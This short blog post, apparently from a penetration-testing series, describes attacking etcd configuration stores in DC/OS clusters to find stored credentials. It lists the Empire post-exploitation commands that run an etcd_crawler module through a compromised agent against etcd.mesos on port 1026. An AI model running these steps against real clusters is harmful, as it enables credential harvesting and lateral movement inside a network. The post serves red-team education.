OWNerchestration - Etcd

etcd is a distributed key value store that provides a reliable way to store data across a cluster of machines. Frequently, configuration stores, including etcd, will be used to store credentials to access various services that applications need to interact to perform their intended purposes. If an attacker can query these configuration stores, they may be able to use this information to expand access within a target network.

We can use the “etcd_crawler” module to list Marathon jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/etcd_crawler
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> set Target etcd.mesos
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> set Port 1026
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> execute

You can see a quick demo of this process in the following video…

Bryce KunzComment